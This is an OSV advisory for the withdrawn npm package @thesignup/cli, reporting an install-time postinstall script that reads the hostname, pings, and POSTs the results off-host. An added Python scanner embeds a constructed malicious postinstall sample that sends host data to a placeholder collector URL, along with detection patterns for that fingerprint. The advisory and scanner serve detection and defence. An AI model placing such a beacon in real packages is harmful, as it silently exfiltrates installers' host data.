MAL-2026-4456

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@thesignup/cli/MAL-2026-4456.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4456
Withdrawn
2026-05-26T18:24:46Z
Published
2026-05-20T03:06:44Z
Modified
2026-05-27T00:31:51.659387823Z
Summary
Malicious code in @thesignup/cli (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (ba2a0430ac2be1496dc77d4ad0a94d89bcf563d4aadb4eb457812b7572aa8367)

The package's scripts/postinstall.cjs runs at install time, performs host reconnaissance (reads the hostname, probes the network with ping) and sends the results to a remote endpoint with an HTTP POST. An outbound beacon fired from an npm lifecycle script that collects host identifiers and ships them off-host is an active-attack shape: every installer of the package becomes a data point for the operator, with no consent and no opt-out, and the beacon fires before the user has had a chance to read the README. The combination (postinstall hook, ping, hostname read, POST to a remote host) is the canonical install-time exfiltration fingerprint.
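The fingerprint above can be checked mechanically before a package is installed. The following is an added example, not part of the OSV record and not tooling from ossf/malicious-packages or Amazon Inspector: it reads package.json, follows the files named in lifecycle hooks, flags the recon + beacon combination with coarse regexes, and hashes the script so it can be compared with the evidence_files sha256 in an advisory's indicators block. Both package layouts it scans are constructed samples written into a temp directory, and collector.example.invalid is a hypothetical endpoint.

```python
"""Heuristic scanner for the install-time recon + beacon pattern
(lifecycle hook + hostname read + ping + HTTP POST to a remote host).
Added example; not the OSV record's or the malicious-packages project's code.
All package contents below are constructed; the collector URL is hypothetical."""
import base64
import hashlib
import json
import os
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Coarse indicators over script source. Hits are judged in combination,
# not individually, to limit false positives on ordinary build scripts.
INDICATORS = {
    "hostname_read": re.compile(r"os\.hostname\s*\(|\bhostname\b"),
    "network_probe": re.compile(r"\b(?:ping|traceroute|nslookup|dig)\b"),
    "shell_exec": re.compile(r"child_process|\b(?:exec|spawn)(?:Sync)?\s*\("),
    "http_post": re.compile(r"method\s*:\s*['\"]POST['\"]|\bfetch\s*\(|https?\.request\s*\("),
    "remote_url": re.compile(r"https?://[^\s'\"`]+"),
}
FILE_TOKEN = re.compile(r"[\w./-]+\.(?:c?js|mjs|sh)")


def sha256_file(path):
    """Hex sha256 of a file, comparable with an advisory's evidence_files entry."""
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def sri_sha512(data):
    """Subresource-integrity form of sha512, as npm records tarball hashes."""
    return "sha512-" + base64.b64encode(hashlib.sha512(data).digest()).decode()


def verify_sri(data, expected_sri):
    return sri_sha512(data) == expected_sri


def lifecycle_scripts(pkg_dir):
    with open(os.path.join(pkg_dir, "package.json"), encoding="utf-8") as fh:
        scripts = json.load(fh).get("scripts", {})
    return {hook: cmd for hook, cmd in scripts.items() if hook in LIFECYCLE_HOOKS}


def scan_package(pkg_dir):
    """Return indicator hits per lifecycle script source and an overall verdict."""
    hits = {}
    for hook, cmd in lifecycle_scripts(pkg_dir).items():
        sources = {f"{hook} (inline)": cmd}
        # Follow file arguments such as `node scripts/postinstall.cjs`.
        for token in FILE_TOKEN.findall(cmd):
            path = os.path.join(pkg_dir, token)
            if os.path.isfile(path):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    sources[token] = fh.read()
        for name, text in sources.items():
            found = sorted(k for k, rx in INDICATORS.items() if rx.search(text))
            if found:
                hits[name] = found
    all_hits = set().union(*hits.values())
    recon = {"hostname_read", "network_probe"} & all_hits
    beacon = {"http_post", "remote_url"} <= all_hits
    verdict = "install-time beacon" if recon and beacon else "no beacon pattern"
    return {"hits": hits, "verdict": verdict}


# Constructed postinstall sources: one with the full fingerprint, one benign.
MALICIOUS_POSTINSTALL = r"""
const os = require("os");
const { execSync } = require("child_process");
const https = require("https");
const host = os.hostname();
let probe = "";
try { probe = execSync("ping -c 1 example.invalid").toString(); } catch (e) {}
const req = https.request("https://collector.example.invalid/report", { method: "POST" });
req.end(JSON.stringify({ host, probe }));
"""
BENIGN_POSTINSTALL = r"""
const fs = require("fs");
fs.mkdirSync("dist", { recursive: true });
console.log("build complete");
"""


def build_sample_package(postinstall_source):
    """Write a constructed npm package layout into a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="pkgscan-")
    os.makedirs(os.path.join(root, "scripts"))
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "@example/sample", "version": "0.0.2",
                   "scripts": {"postinstall": "node scripts/postinstall.cjs"}}, fh)
    with open(os.path.join(root, "scripts", "postinstall.cjs"), "w", encoding="utf-8") as fh:
        fh.write(postinstall_source)
    return root


if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_POSTINSTALL), ("benign", BENIGN_POSTINSTALL)):
        pkg = build_sample_package(src)
        report = scan_package(pkg)
        script_hash = sha256_file(os.path.join(pkg, "scripts", "postinstall.cjs"))
        print(label, report["verdict"], report["hits"], script_hash)
```

Run against an unpacked tarball (`tar xzf cli-0.0.2.tgz` yields a `package/` directory) rather than a node_modules copy, since by then the hook has already fired. In CI, `npm ci --ignore-scripts` keeps lifecycle hooks from running at all, which leaves room to inspect any flagged script before enabling them.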

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-003443",
            "import_time": "2026-05-26T05:50:39.189589681Z",
            "sha256": "8eb160b9b736e0120209e13d882edaba68979adac4e98025ab55507017a62080",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T03:06:45Z",
            "versions": [
                "0.0.2"
            ]
        },
        {
            "id": "IN-MAL-2026-003442",
            "import_time": "2026-05-26T05:50:39.082387478Z",
            "sha256": "ba2a0430ac2be1496dc77d4ad0a94d89bcf563d4aadb4eb457812b7572aa8367",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T03:06:44Z",
            "versions": [
                "0.0.2"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / @thesignup/cli

Package

Name
@thesignup/cli
Purl
pkg:npm/%40thesignup%2Fcli

Affected ranges

Affected versions

0.*
0.0.2

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@thesignup/cli/MAL-2026-4456.json"
indicators
{
    "evidence_files": [
        {
            "path": "scripts/postinstall.cjs",
            "sha256": "a16a00d8543fd436591dcca443509a160b85ce7c84cea98163971f01593880bd",
            "tlsh": "e9e1c8cc5aeb523017b3715a961fb089e7a754133319c8b4f89d41083f92678cbe79ea"
        }
    ],
    "package_integrity": [
        {
            "filename": "cli-0.0.2.tgz",
            "hashes": {
                "sha512_sri": "sha512-8bg6sN3rHdzrI8qf042NN3yZKG93uh782/2J1tflf/i3cPK1xERaByda2E2FagR44DEagjpzXjJFnO+ftxLvWQ==",
                "sha1": "f011682761d1a49bfa9e3174146f9145609bf811"
            }
        }
    ],
    "domains": [
        "34.0.16.104.in-addr.arpa",
        "34.1.16.104.in-addr.arpa",
        "github.com",
        "release-assets.githubusercontent.com"
    ]
}